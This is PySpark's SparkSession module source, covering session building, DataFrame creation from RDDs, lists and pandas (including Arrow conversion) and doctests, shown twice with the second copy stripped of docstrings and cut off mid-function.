>>> s1.conf.get("k1") == "v1"
True
In case an existing SparkSession is returned, the config options specified
in this builder will be applied to the existing SparkSession.
>>> s2 = SparkSession.builder.config("k2", "v2").getOrCreate()
>>> s1.conf.get("k1") == s2.conf.get("k1")
True
>>> s1.conf.get("k2") == s2.conf.get("k2")
True
"""
with self._lock:
from pyspark.context import SparkContext
from pyspark.conf import SparkConf
session = SparkSession._instantiatedSession
if session is None or session._sc._jsc is None:
if self._sc is not None:
sc = self._sc
else:
sparkConf = SparkConf()
for key, value in self._options.items():
sparkConf.set(key, value)
# This SparkContext may be an existing one.
sc = SparkContext.getOrCreate(sparkConf)
# Do not update `SparkConf` for existing `SparkContext`, as it's shared
# by all sessions.
session = SparkSession(sc)
for key, value in self._options.items():
session._jsparkSession.sessionState().conf().setConfString(key, value)
return session
builder = Builder()
"""A class attribute having a :class:`Builder` to construct :class:`SparkSession` instances."""
_instantiatedSession = None
_activeSession = None
@ignore_unicode_prefix
def __init__(self, sparkContext, jsparkSession=None):
"""Creates a new SparkSession.
>>> from datetime import datetime
>>> spark = SparkSession(sc)
>>> allTypes = sc.parallelize([Row(i=1, s="string", d=1.0, l=1,
... b=True, list=[1, 2, 3], dict={"s": 0}, row=Row(a=1),
... time=datetime(2014, 8, 1, 14, 1, 5))])
>>> df = allTypes.toDF()
>>> df.createOrReplaceTempView("allTypes")
>>> spark.sql('select i+1, d+1, not b, list[1], dict["s"], time, row.a '
... 'from allTypes where b and i > 0').collect()
[Row((i + CAST(1 AS BIGINT))=2, (d + CAST(1 AS DOUBLE))=2.0, (NOT b)=False, list[1]=2, \
dict[s]=0, time=datetime.datetime(2014, 8, 1, 14, 1, 5), a=1)]
>>> df.rdd.map(lambda x: (x.i, x.s, x.d, x.l, x.b, x.time, x.row.a, x.list)).collect()
[(1, u'string', 1.0, 1, True, datetime.datetime(2014, 8, 1, 14, 1, 5), 1, [1, 2, 3])]
"""
from pyspark.sql.context import SQLContext
self._sc = sparkContext
self._jsc = self._sc._jsc
self._jvm = self._sc._jvm
if jsparkSession is None:
if self._jvm.SparkSession.getDefaultSession().isDefined() \
and not self._jvm.SparkSession.getDefaultSession().get() \
.sparkContext().isStopped():
jsparkSession = self._jvm.SparkSession.getDefaultSession().get()
else:
jsparkSession = self._jvm.SparkSession(self._jsc.sc())
self._jsparkSession = jsparkSession
self._jwrapped = self._jsparkSession.sqlContext()
self._wrapped = SQLContext(self._sc, self, self._jwrapped)
_monkey_patch_RDD(self)
install_exception_handler()
# If we had an instantiated SparkSession attached with a SparkContext
# which is stopped now, we need to renew the instantiated SparkSession.
# Otherwise, we will use invalid SparkSession when we call Builder.getOrCreate.
if SparkSession._instantiatedSession is None \
or SparkSession._instantiatedSession._sc._jsc is None:
SparkSession._instantiatedSession = self
SparkSession._activeSession = self
self._jvm.SparkSession.setDefaultSession(self._jsparkSession)
self._jvm.SparkSession.setActiveSession(self._jsparkSession)
def _repr_html_(self):
return """
<div>
<p><b>SparkSession - {catalogImplementation}</b></p>
{sc_HTML}
</div>
""".format(
catalogImplementation=self.conf.get("spark.sql.catalogImplementation"),
sc_HTML=self.sparkContext._repr_html_()
)
@since(2.0)
def newSession(self):
"""
Returns a new SparkSession as new session, that has separate SQLConf,
registered temporary views and UDFs, but shared SparkContext and
table cache.
"""
return self.__class__(self._sc, self._jsparkSession.newSession())
@classmethod
@since(3.0)
def getActiveSession(cls):
"""
Returns the active SparkSession for the current thread, returned by the builder.
>>> s = SparkSession.getActiveSession()
>>> l = [('Alice', 1)]
>>> rdd = s.sparkContext.parallelize(l)
>>> df = s.createDataFrame(rdd, ['name', 'age'])
>>> df.select("age").collect()
[Row(age=1)]
"""
from pyspark import SparkContext
sc = SparkContext._active_spark_context
if sc is None:
return None
else:
if sc._jvm.SparkSession.getActiveSession().isDefined():
SparkSession(sc, sc._jvm.SparkSession.getActiveSession().get())
return SparkSession._activeSession
else:
return None
@property
@since(2.0)
def sparkContext(self):
"""Returns the underlying :class:`SparkContext`."""
return self._sc
@property
@since(2.0)
def version(self):
"""The version of Spark on which this application is running."""
return self._jsparkSession.version()
@property
@since(2.0)
def conf(self):
"""Runtime configuration interface for Spark.
This is the interface through which the user can get and set all Spark and Hadoop
configurations that are relevant to Spark SQL. When getting the value of a config,
this defaults to the value set in the underlying :class:`SparkContext`, if any.
"""
if not hasattr(self, "_conf"):
self._conf = RuntimeConfig(self._jsparkSession.conf())
return self._conf
@property
@since(2.0)
def catalog(self):
"""Interface through which the user may create, drop, alter or query underlying
databases, tables, functions, etc.
:return: :class:`Catalog`
"""
from pyspark.sql.catalog import Catalog
if not hasattr(self, "_catalog"):
self._catalog = Catalog(self)
return self._catalog
@property
@since(2.0)
def udf(self):
"""Returns a :class:`UDFRegistration` for UDF registration.
:return: :class:`UDFRegistration`
"""
from pyspark.sql.udf import UDFRegistration
return UDFRegistration(self)
@since(2.0)
def range(self, start, end=None, step=1, numPartitions=None):
"""
Create a :class:`DataFrame` with single :class:`pyspark.sql.types.LongType` column named
``id``, containing elements in a range from ``start`` to ``end`` (exclusive) with
step value ``step``.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numPartitions: the number of partitions of the DataFrame
:return: :class:`DataFrame`
>>> spark.range(1, 7, 2).collect()
[Row(id=1), Row(id=3), Row(id=5)]
If only one argument is specified, it will be used as the end value.
>>> spark.range(3).collect()
[Row(id=0), Row(id=1), Row(id=2)]
"""
if numPartitions is None:
numPartitions = self._sc.defaultParallelism
if end is None:
jdf = self._jsparkSession.range(0, int(start), int(step), int(numPartitions))
else:
jdf = self._jsparkSession.range(int(start), int(end), int(step), int(numPartitions))
return DataFrame(jdf, self._wrapped)
def _inferSchemaFromList(self, data, names=None):
"""
Infer schema from list of Row or tuple.
:param data: list of Row or tuple
:param names: list of column names
:return: :class:`pyspark.sql.types.StructType`
"""
if not data:
raise ValueError("can not infer schema from empty dataset")
first = data[0]
if type(first) is dict:
warnings.warn("inferring schema from dict is deprecated,"
"please use pyspark.sql.Row instead")
schema = reduce(_merge_type, (_infer_schema(row, names) for row in data))
if _has_nulltype(schema):
raise ValueError("Some of types cannot be determined after inferring")
return schema
def _inferSchema(self, rdd, samplingRatio=None, names=None):
"""
Infer schema from an RDD of Row or tuple.
:param rdd: an RDD of Row or tuple
:param samplingRatio: sampling ratio, or no sampling (default)
:return: :class:`pyspark.sql.types.StructType`
"""
first = rdd.first()
if not first:
raise ValueError("The first row in RDD is empty, "
"can not infer schema")
if type(first) is dict:
warnings.warn("Using RDD of dict to inferSchema is deprecated. "
"Use pyspark.sql.Row instead")
if samplingRatio is None:
schema = _infer_schema(first, names=names)
if _has_nulltype(schema):
for row in rdd.take(100)[1:]:
schema = _merge_type(schema, _infer_schema(row, names=names))
if not _has_nulltype(schema):
break
else:
raise ValueError("Some of types cannot be determined by the "
"first 100 rows, please try again with sampling")
else:
if samplingRatio < 0.99:
rdd = rdd.sample(False, float(samplingRatio))
schema = rdd.map(lambda row: _infer_schema(row, names)).reduce(_merge_type)
return schema
def _createFromRDD(self, rdd, schema, samplingRatio):
"""
Create an RDD for DataFrame from an existing RDD, returns the RDD and schema.
"""
if schema is None or isinstance(schema, (list, tuple)):
struct = self._inferSchema(rdd, samplingRatio, names=schema)
converter = _create_converter(struct)
rdd = rdd.map(converter)
if isinstance(schema, (list, tuple)):
for i, name in enumerate(schema):
struct.fields[i].name = name
struct.names[i] = name
schema = struct
elif not isinstance(schema, StructType):
raise TypeError("schema should be StructType or list or None, but got: %s" % schema)
# convert python objects to sql data
rdd = rdd.map(schema.toInternal)
return rdd, schema
def _createFromLocal(self, data, schema):
"""
Create an RDD for DataFrame from a list or pandas.DataFrame, returns
the RDD and schema.
"""
# make sure data could consumed multiple times
if not isinstance(data, list):
data = list(data)
if schema is None or isinstance(schema, (list, tuple)):
struct = self._inferSchemaFromList(data, names=schema)
converter = _create_converter(struct)
data = map(converter, data)
if isinstance(schema, (list, tuple)):
for i, name in enumerate(schema):
struct.fields[i].name = name
struct.names[i] = name
schema = struct
elif not isinstance(schema, StructType):
raise TypeError("schema should be StructType or list or None, but got: %s" % schema)
# convert python objects to sql data
data = [schema.toInternal(row) for row in data]
return self._sc.parallelize(data), schema
def _get_numpy_record_dtype(self, rec):
"""
Used when converting a pandas.DataFrame to Spark using to_records(), this will correct
the dtypes of fields in a record so they can be properly loaded into Spark.
:param rec: a numpy record to check field dtypes
:return corrected dtype for a numpy.record or None if no correction needed
"""
import numpy as np
cur_dtypes = rec.dtype
col_names = cur_dtypes.names
record_type_list = []
has_rec_fix = False
for i in xrange(len(cur_dtypes)):
curr_type = cur_dtypes[i]
# If type is a datetime64 timestamp, convert to microseconds
# NOTE: if dtype is datetime[ns] then np.record.tolist() will output values as longs,
# conversion from [us] or lower will lead to py datetime objects, see SPARK-22417
if curr_type == np.dtype('datetime64[ns]'):
curr_type = 'datetime64[us]'
has_rec_fix = True
record_type_list.append((str(col_names[i]), curr_type))
return np.dtype(record_type_list) if has_rec_fix else None
def _convert_from_pandas(self, pdf, schema, timezone):
"""
Convert a pandas.DataFrame to list of records that can be used to make a DataFrame
:return list of records
"""
if timezone is not None:
from pyspark.sql.types import _check_series_convert_timestamps_tz_local
copied = False
if isinstance(schema, StructType):
for field in schema:
# TODO: handle nested timestamps, such as ArrayType(TimestampType())?
if isinstance(field.dataType, TimestampType):
s = _check_series_convert_timestamps_tz_local(pdf[field.name], timezone)
if s is not pdf[field.name]:
if not copied:
# Copy once if the series is modified to prevent the original
# Pandas DataFrame from being updated
pdf = pdf.copy()
copied = True
pdf[field.name] = s
else:
for column, series in pdf.iteritems():
s = _check_series_convert_timestamps_tz_local(series, timezone)
if s is not series:
if not copied:
# Copy once if the series is modified to prevent the original
# Pandas DataFrame from being updated
pdf = pdf.copy()
copied = True
pdf[column] = s
# Convert pandas.DataFrame to list of numpy records
np_records = pdf.to_records(index=False)
# Check if any columns need to be fixed for Spark to infer properly
if len(np_records) > 0:
record_dtype = self._get_numpy_record_dtype(np_records[0])
if record_dtype is not None:
return [r.astype(record_dtype).tolist() for r in np_records]
# Convert list of numpy records to python lists
return [r.tolist() for r in np_records]
def _create_from_pandas_with_arrow(self, pdf, schema, timezone):
"""
Create a DataFrame from a given pandas.DataFrame by slicing it into partitions, converting
to Arrow data, then sending to the JVM to parallelize. If a schema is passed in, the
data types will be used to coerce the data in Pandas to Arrow conversion.
"""
from pyspark.serializers import ArrowStreamPandasSerializer
from pyspark.sql.types import from_arrow_type, to_arrow_type, TimestampType
from pyspark.sql.utils import require_minimum_pandas_version, \
require_minimum_pyarrow_version
require_minimum_pandas_version()
require_minimum_pyarrow_version()
from pandas.api.types import is_datetime64_dtype, is_datetime64tz_dtype
import pyarrow as pa
# Create the Spark schema from list of names passed in with Arrow types
if isinstance(schema, (list, tuple)):
arrow_schema = pa.Schema.from_pandas(pdf, preserve_index=False)
struct = StructType()
for name, field in zip(schema, arrow_schema):
struct.add(name, from_arrow_type(field.type), nullable=field.nullable)
schema = struct
# Determine arrow types to coerce data when creating batches
if isinstance(schema, StructType):
arrow_types = [to_arrow_type(f.dataType) for f in schema.fields]
elif isinstance(schema, DataType):
raise ValueError("Single data type %s is not supported with Arrow" % str(schema))
else:
# Any timestamps must be coerced to be compatible with Spark
arrow_types = [to_arrow_type(TimestampType())
if is_datetime64_dtype(t) or is_datetime64tz_dtype(t) else None
for t in pdf.dtypes]
# Slice the DataFrame to be batched
step = -(-len(pdf) // self.sparkContext.defaultParallelism) # round int up
pdf_slices = (pdf[start:start + step] for start in xrange(0, len(pdf), step))
# Create list of Arrow (columns, type) for serializer dump_stream
arrow_data = [[(c, t) for (_, c), t in zip(pdf_slice.iteritems(), arrow_types)]
for pdf_slice in pdf_slices]
jsqlContext = self._wrapped._jsqlContext
safecheck = self._wrapped._conf.arrowSafeTypeConversion()
col_by_name = True # col by name only applies to StructType columns, can't happen here
ser = ArrowStreamPandasSerializer(timezone, safecheck, col_by_name)
def reader_func(temp_filename):
return self._jvm.PythonSQLUtils.readArrowStreamFromFile(jsqlContext, temp_filename)
def create_RDD_server():
return self._jvm.ArrowRDDServer(jsqlContext)
# Create Spark DataFrame from Arrow stream file, using one batch per partition
jrdd = self._sc._serialize_to_jvm(arrow_data, ser, reader_func, create_RDD_server)
jdf = self._jvm.PythonSQLUtils.toDataFrame(jrdd, schema.json(), jsqlContext)
df = DataFrame(jdf, self._wrapped)
df._schema = schema
return df
@staticmethod
def _create_shell_session():
"""
Initialize a SparkSession for a pyspark shell session. This is called from shell.py
to make error handling simpler without needing to declare local variables in that
script, which would expose those to users.
"""
import py4j
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
try:
# Try to access HiveConf, it will raise exception if Hive is not added
conf = SparkConf()
if conf.get('spark.sql.catalogImplementation', 'hive').lower() == 'hive':
SparkContext._jvm.org.apache.hadoop.hive.conf.HiveConf()
return SparkSession.builder\
.enableHiveSupport()\
.getOrCreate()
else:
return SparkSession.builder.getOrCreate()
except (py4j.protocol.Py4JError, TypeError):
if conf.get('spark.sql.catalogImplementation', '').lower() == 'hive':
warnings.warn("Fall back to non-hive support because failing to access HiveConf, "
"please make sure you build spark with hive")
return SparkSession.builder.getOrCreate()
@since(2.0)
@ignore_unicode_prefix
def createDataFrame(self, data, schema=None, samplingRatio=None, verifySchema=True):
"""
Creates a :class:`DataFrame` from an :class:`RDD`, a list or a :class:`pandas.DataFrame`.
When ``schema`` is a list of column names, the type of each column
will be inferred from ``data``.
When ``schema`` is ``None``, it will try to infer the schema (column names and types)
from ``data``, which should be an RDD of either :class:`Row`,
:class:`namedtuple`, or :class:`dict`.
When ``schema`` is :class:`pyspark.sql.types.DataType` or a datatype string, it must match
the real data, or an exception will be thrown at runtime. If the given schema is not
:class:`pyspark.sql.types.StructType`, it will be wrapped into a
:class:`pyspark.sql.types.StructType` as its only field, and the field name will be "value".
Each record will also be wrapped into a tuple, which can be converted to row later.
If schema inference is needed, ``samplingRatio`` is used to determined the ratio of
rows used for schema inference. The first row will be used if ``samplingRatio`` is ``None``.
:param data: an RDD of any kind of SQL data representation (e.g. row, tuple, int, boolean,
etc.), :class:`list`, or :class:`pandas.DataFrame`.
:param schema: a :class:`pyspark.sql.types.DataType` or a datatype string or a list of
column names, default is ``None``. The data type string format equals to
:class:`pyspark.sql.types.DataType.simpleString`, except that top level struct type can
omit the ``struct<>`` and atomic types use ``typeName()`` as their format, e.g. use
``byte`` instead of ``tinyint`` for :class:`pyspark.sql.types.ByteType`. We can also use
``int`` as a short name for ``IntegerType``.
:param samplingRatio: the sample ratio of rows used for inferring
:param verifySchema: verify data types of every row against schema.
:return: :class:`DataFrame`
.. versionchanged:: 2.1
Added verifySchema.
.. note:: Usage with spark.sql.execution.arrow.pyspark.enabled=True is experimental.
.. note:: When Arrow optimization is enabled, strings inside Pandas DataFrame in Python
2 are converted into bytes as they are bytes in Python 2 whereas regular strings are
left as strings. When using strings in Python 2, use unicode `u""` as Python standard
practice.
>>> l = [('Alice', 1)]
>>> spark.createDataFrame(l).collect()
[Row(_1=u'Alice', _2=1)]
>>> spark.createDataFrame(l, ['name', 'age']).collect()
[Row(name=u'Alice', age=1)]
>>> d = [{'name': 'Alice', 'age': 1}]
>>> spark.createDataFrame(d).collect()
[Row(age=1, name=u'Alice')]
>>> rdd = sc.parallelize(l)
>>> spark.createDataFrame(rdd).collect()
[Row(_1=u'Alice', _2=1)]
>>> df = spark.createDataFrame(rdd, ['name', 'age'])
>>> df.collect()
[Row(name=u'Alice', age=1)]
>>> from pyspark.sql import Row
>>> Person = Row('name', 'age')
>>> person = rdd.map(lambda r: Person(*r))
>>> df2 = spark.createDataFrame(person)
>>> df2.collect()
[Row(name=u'Alice', age=1)]
>>> from pyspark.sql.types import *
>>> schema = StructType([
... StructField("name", StringType(), True),
... StructField("age", IntegerType(), True)])
>>> df3 = spark.createDataFrame(rdd, schema)
>>> df3.collect()
[Row(name=u'Alice', age=1)]
>>> spark.createDataFrame(df.toPandas()).collect() # doctest: +SKIP
[Row(name=u'Alice', age=1)]
>>> spark.createDataFrame(pandas.DataFrame([[1, 2]])).collect() # doctest: +SKIP
[Row(0=1, 1=2)]
>>> spark.createDataFrame(rdd, "a: string, b: int").collect()
[Row(a=u'Alice', b=1)]
>>> rdd = rdd.map(lambda row: row[1])
>>> spark.createDataFrame(rdd, "int").collect()
[Row(value=1)]
>>> spark.createDataFrame(rdd, "boolean").collect() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError: ...
"""
SparkSession._activeSession = self
self._jvm.SparkSession.setActiveSession(self._jsparkSession)
if isinstance(data, DataFrame):
raise TypeError("data is already a DataFrame")
if isinstance(schema, basestring):
schema = _parse_datatype_string(schema)
elif isinstance(schema, (list, tuple)):
# Must re-encode any unicode strings to be consistent with StructField names
schema = [x.encode('utf-8') if not isinstance(x, str) else x for x in schema]
try:
import pandas
has_pandas = True
except Exception:
has_pandas = False
if has_pandas and isinstance(data, pandas.DataFrame):
from pyspark.sql.utils import require_minimum_pandas_version
require_minimum_pandas_version()
if self._wrapped._conf.pandasRespectSessionTimeZone():
timezone = self._wrapped._conf.sessionLocalTimeZone()
else:
timezone = None
# If no schema supplied by user then get the names of columns only
if schema is None:
schema = [str(x) if not isinstance(x, basestring) else
(x.encode('utf-8') if not isinstance(x, str) else x)
for x in data.columns]
if self._wrapped._conf.arrowPySparkEnabled() and len(data) > 0:
try:
return self._create_from_pandas_with_arrow(data, schema, timezone)
except Exception as e:
from pyspark.util import _exception_message
if self._wrapped._conf.arrowPySparkFallbackEnabled():
msg = (
"createDataFrame attempted Arrow optimization because "
"'spark.sql.execution.arrow.pyspark.enabled' is set to true; however, "
"failed by the reason below:\n %s\n"
"Attempting non-optimization as "
"'spark.sql.execution.arrow.pyspark.fallback.enabled' is set to "
"true." % _exception_message(e))
warnings.warn(msg)
else:
msg = (
"createDataFrame attempted Arrow optimization because "
"'spark.sql.execution.arrow.pyspark.enabled' is set to true, but has "
"reached the error below and will not continue because automatic "
"fallback with 'spark.sql.execution.arrow.pyspark.fallback.enabled' "
"has been set to false.\n %s" % _exception_message(e))
warnings.warn(msg)
raise
data = self._convert_from_pandas(data, schema, timezone)
if isinstance(schema, StructType):
verify_func = _make_type_verifier(schema) if verifySchema else lambda _: True
def prepare(obj):
verify_func(obj)
return obj
elif isinstance(schema, DataType):
dataType = schema
schema = StructType().add("value", schema)
verify_func = _make_type_verifier(
dataType, name="field value") if verifySchema else lambda _: True
def prepare(obj):
verify_func(obj)
return obj,
else:
prepare = lambda obj: obj
if isinstance(data, RDD):
rdd, schema = self._createFromRDD(data.map(prepare), schema, samplingRatio)
else:
rdd, schema = self._createFromLocal(map(prepare, data), schema)
jrdd = self._jvm.SerDeUtil.toJavaArray(rdd._to_java_object_rdd())
jdf = self._jsparkSession.applySchemaToPythonRDD(jrdd.rdd(), schema.json())
df = DataFrame(jdf, self._wrapped)
df._schema = schema
return df
@ignore_unicode_prefix
@since(2.0)
def sql(self, sqlQuery):
"""Returns a :class:`DataFrame` representing the result of the given query.
:return: :class:`DataFrame`
>>> df.createOrReplaceTempView("table1")
>>> df2 = spark.sql("SELECT field1 AS f1, field2 as f2 from table1")
>>> df2.collect()
[Row(f1=1, f2=u'row1'), Row(f1=2, f2=u'row2'), Row(f1=3, f2=u'row3')]
"""
return DataFrame(self._jsparkSession.sql(sqlQuery), self._wrapped)
@since(2.0)
def table(self, tableName):
"""Returns the specified table as a :class:`DataFrame`.
:return: :class:`DataFrame`
>>> df.createOrReplaceTempView("table1")
>>> df2 = spark.table("table1")
>>> sorted(df.collect()) == sorted(df2.collect())
True
"""
return DataFrame(self._jsparkSession.table(tableName), self._wrapped)
@property
@since(2.0)
def read(self):
"""
Returns a :class:`DataFrameReader` that can be used to read data
in as a :class:`DataFrame`.
:return: :class:`DataFrameReader`
"""
return DataFrameReader(self._wrapped)
@property
@since(2.0)
def readStream(self):
"""
Returns a :class:`DataStreamReader` that can be used to read data streams
as a streaming :class:`DataFrame`.
.. note:: Evolving.
:return: :class:`DataStreamReader`
"""
return DataStreamReader(self._wrapped)
@property
@since(2.0)
def streams(self):
"""Returns a :class:`StreamingQueryManager` that allows managing all the
:class:`StreamingQuery` instances active on `this` context.
.. note:: Evolving.
:return: :class:`StreamingQueryManager`
"""
from pyspark.sql.streaming import StreamingQueryManager
return StreamingQueryManager(self._jsparkSession.streams())
@since(2.0)
def stop(self):
"""Stop the underlying :class:`SparkContext`.
"""
self._sc.stop()
# We should clean the default session up. See SPARK-23228.
self._jvm.SparkSession.clearDefaultSession()
self._jvm.SparkSession.clearActiveSession()
SparkSession._instantiatedSession = None
SparkSession._activeSession = None
@since(2.0)
def __enter__(self):
"""
Enable 'with SparkSession.builder.(...).getOrCreate() as session: app' syntax.
"""
return self
@since(2.0)
def __exit__(self, exc_type, exc_val, exc_tb):
"""
Enable 'with SparkSession.builder.(...).getOrCreate() as session: app' syntax.
Specifically stop the SparkSession on exit of the with block.
"""
self.stop()
def _test():
import os
import doctest
from pyspark.context import SparkContext
from pyspark.sql import Row
import pyspark.sql.session
os.chdir(os.environ["SPARK_HOME"])
globs = pyspark.sql.session.__dict__.copy()
sc = SparkContext('local[4]', 'PythonTest')
globs['sc'] = sc
globs['spark'] = SparkSession(sc)
globs['rdd'] = rdd = sc.parallelize(
[Row(field1=1, field2="row1"),
Row(field1=2, field2="row2"),
Row(field1=3, field2="row3")])
globs['df'] = rdd.toDF()
(failure_count, test_count) = doctest.testmod(
pyspark.sql.session, globs=globs,
optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
| 41.404162 | 100 | 0.598513 |
from __future__ import print_function
import sys
import warnings
from functools import reduce
from threading import RLock
if sys.version >= '3':
basestring = unicode = str
xrange = range
else:
from itertools import izip as zip, imap as map
from pyspark import since
from pyspark.rdd import RDD, ignore_unicode_prefix
from pyspark.sql.conf import RuntimeConfig
from pyspark.sql.dataframe import DataFrame
from pyspark.sql.readwriter import DataFrameReader
from pyspark.sql.streaming import DataStreamReader
from pyspark.sql.types import Row, DataType, StringType, StructType, TimestampType, \
_make_type_verifier, _infer_schema, _has_nulltype, _merge_type, _create_converter, \
_parse_datatype_string
from pyspark.sql.utils import install_exception_handler
__all__ = ["SparkSession"]
def _monkey_patch_RDD(sparkSession):
def toDF(self, schema=None, sampleRatio=None):
return sparkSession.createDataFrame(self, schema, sampleRatio)
RDD.toDF = toDF
class SparkSession(object):
class Builder(object):
_lock = RLock()
_options = {}
_sc = None
@since(2.0)
def config(self, key=None, value=None, conf=None):
with self._lock:
if conf is None:
self._options[key] = str(value)
else:
for (k, v) in conf.getAll():
self._options[k] = v
return self
@since(2.0)
def master(self, master):
return self.config("spark.master", master)
@since(2.0)
def appName(self, name):
return self.config("spark.app.name", name)
@since(2.0)
def enableHiveSupport(self):
return self.config("spark.sql.catalogImplementation", "hive")
def _sparkContext(self, sc):
with self._lock:
self._sc = sc
return self
@since(2.0)
def getOrCreate(self):
with self._lock:
from pyspark.context import SparkContext
from pyspark.conf import SparkConf
session = SparkSession._instantiatedSession
if session is None or session._sc._jsc is None:
if self._sc is not None:
sc = self._sc
else:
sparkConf = SparkConf()
for key, value in self._options.items():
sparkConf.set(key, value)
sc = SparkContext.getOrCreate(sparkConf)
# by all sessions.
session = SparkSession(sc)
for key, value in self._options.items():
session._jsparkSession.sessionState().conf().setConfString(key, value)
return session
builder = Builder()
_instantiatedSession = None
_activeSession = None
@ignore_unicode_prefix
def __init__(self, sparkContext, jsparkSession=None):
from pyspark.sql.context import SQLContext
self._sc = sparkContext
self._jsc = self._sc._jsc
self._jvm = self._sc._jvm
if jsparkSession is None:
if self._jvm.SparkSession.getDefaultSession().isDefined() \
and not self._jvm.SparkSession.getDefaultSession().get() \
.sparkContext().isStopped():
jsparkSession = self._jvm.SparkSession.getDefaultSession().get()
else:
jsparkSession = self._jvm.SparkSession(self._jsc.sc())
self._jsparkSession = jsparkSession
self._jwrapped = self._jsparkSession.sqlContext()
self._wrapped = SQLContext(self._sc, self, self._jwrapped)
_monkey_patch_RDD(self)
install_exception_handler()
# If we had an instantiated SparkSession attached with a SparkContext
# which is stopped now, we need to renew the instantiated SparkSession.
# Otherwise, we will use invalid SparkSession when we call Builder.getOrCreate.
if SparkSession._instantiatedSession is None \
or SparkSession._instantiatedSession._sc._jsc is None:
SparkSession._instantiatedSession = self
SparkSession._activeSession = self
self._jvm.SparkSession.setDefaultSession(self._jsparkSession)
self._jvm.SparkSession.setActiveSession(self._jsparkSession)
def _repr_html_(self):
return """
<div>
<p><b>SparkSession - {catalogImplementation}</b></p>
{sc_HTML}
</div>
""".format(
catalogImplementation=self.conf.get("spark.sql.catalogImplementation"),
sc_HTML=self.sparkContext._repr_html_()
)
@since(2.0)
def newSession(self):
return self.__class__(self._sc, self._jsparkSession.newSession())
@classmethod
@since(3.0)
def getActiveSession(cls):
from pyspark import SparkContext
sc = SparkContext._active_spark_context
if sc is None:
return None
else:
if sc._jvm.SparkSession.getActiveSession().isDefined():
SparkSession(sc, sc._jvm.SparkSession.getActiveSession().get())
return SparkSession._activeSession
else:
return None
@property
@since(2.0)
def sparkContext(self):
return self._sc
@property
@since(2.0)
def version(self):
return self._jsparkSession.version()
@property
@since(2.0)
def conf(self):
if not hasattr(self, "_conf"):
self._conf = RuntimeConfig(self._jsparkSession.conf())
return self._conf
@property
@since(2.0)
def catalog(self):
from pyspark.sql.catalog import Catalog
if not hasattr(self, "_catalog"):
self._catalog = Catalog(self)
return self._catalog
@property
@since(2.0)
def udf(self):
from pyspark.sql.udf import UDFRegistration
return UDFRegistration(self)
@since(2.0)
def range(self, start, end=None, step=1, numPartitions=None):
if numPartitions is None:
numPartitions = self._sc.defaultParallelism
if end is None:
jdf = self._jsparkSession.range(0, int(start), int(step), int(numPartitions))
else:
jdf = self._jsparkSession.range(int(start), int(end), int(step), int(numPartitions))
return DataFrame(jdf, self._wrapped)
def _inferSchemaFromList(self, data, names=None):
if not data:
raise ValueError("can not infer schema from empty dataset")
first = data[0]
if type(first) is dict:
warnings.warn("inferring schema from dict is deprecated,"
"please use pyspark.sql.Row instead")
schema = reduce(_merge_type, (_infer_schema(row, names) for row in data))
if _has_nulltype(schema):
raise ValueError("Some of types cannot be determined after inferring")
return schema
def _inferSchema(self, rdd, samplingRatio=None, names=None):
first = rdd.first()
if not first:
raise ValueError("The first row in RDD is empty, "
"can not infer schema")
if type(first) is dict:
warnings.warn("Using RDD of dict to inferSchema is deprecated. "
"Use pyspark.sql.Row instead")
if samplingRatio is None:
schema = _infer_schema(first, names=names)
if _has_nulltype(schema):
for row in rdd.take(100)[1:]:
schema = _merge_type(schema, _infer_schema(row, names=names))
if not _has_nulltype(schema):
break
else:
raise ValueError("Some of types cannot be determined by the "
"first 100 rows, please try again with sampling")
else:
if samplingRatio < 0.99:
rdd = rdd.sample(False, float(samplingRatio))
schema = rdd.map(lambda row: _infer_schema(row, names)).reduce(_merge_type)
return schema
def _createFromRDD(self, rdd, schema, samplingRatio):
if schema is None or isinstance(schema, (list, tuple)):
struct = self._inferSchema(rdd, samplingRatio, names=schema)
converter = _create_converter(struct)
rdd = rdd.map(converter)
if isinstance(schema, (list, tuple)):
for i, name in enumerate(schema):
struct.fields[i].name = name
struct.names[i] = name
schema = struct
elif not isinstance(schema, StructType):
raise TypeError("schema should be StructType or list or None, but got: %s" % schema)
# convert python objects to sql data
rdd = rdd.map(schema.toInternal)
return rdd, schema
def _createFromLocal(self, data, schema):
# make sure data could consumed multiple times
if not isinstance(data, list):
data = list(data)
if schema is None or isinstance(schema, (list, tuple)):
struct = self._inferSchemaFromList(data, names=schema)
converter = _create_converter(struct)
data = map(converter, data)
if isinstance(schema, (list, tuple)):
for i, name in enumerate(schema):
struct.fields[i].name = name
struct.names[i] = name
schema = struct
elif not isinstance(schema, StructType):
raise TypeError("schema should be StructType or list or None, but got: %s" % schema)
# convert python objects to sql data
data = [schema.toInternal(row) for row in data]
return self._sc.parallelize(data), schema
def _get_numpy_record_dtype(self, rec):
import numpy as np
cur_dtypes = rec.dtype
col_names = cur_dtypes.names
record_type_list = []
has_rec_fix = False
for i in xrange(len(cur_dtypes)):
curr_type = cur_dtypes[i]
# If type is a datetime64 timestamp, convert to microseconds
# NOTE: if dtype is datetime[ns] then np.record.tolist() will output values as longs,
# conversion from [us] or lower will lead to py datetime objects, see SPARK-22417
if curr_type == np.dtype('datetime64[ns]'):
curr_type = 'datetime64[us]'
has_rec_fix = True
record_type_list.append((str(col_names[i]), curr_type))
return np.dtype(record_type_list) if has_rec_fix else None
def _convert_from_pandas(self, pdf, schema, timezone):
if timezone is not None:
from pyspark.sql.types import _check_series_convert_timestamps_tz_local
copied = False
if isinstance(schema, StructType):
for field in schema:
# TODO: handle nested timestamps, such as ArrayType(TimestampType())?
if isinstance(field.dataType, TimestampType):
s = _check_series_convert_timestamps_tz_local(pdf[field.name], timezone)
if s is not pdf[field.name]:
if not copied:
# Copy once if the series is modified to prevent the original
# Pandas DataFrame from being updated
pdf = pdf.copy()
copied = True
pdf[field.name] = s
else:
for column, series in pdf.iteritems():
s = _check_series_convert_timestamps_tz_local(series, timezone)
if s is not series:
if not copied:
# Copy once if the series is modified to prevent the original
# Pandas DataFrame from being updated
pdf = pdf.copy()
copied = True
pdf[column] = s
# Convert pandas.DataFrame to list of numpy records
np_records = pdf.to_records(index=False)
# Check if any columns need to be fixed for Spark to infer properly
if len(np_records) > 0:
record_dtype = self._get_numpy_record_dtype(np_records[0])
if record_dtype is not None:
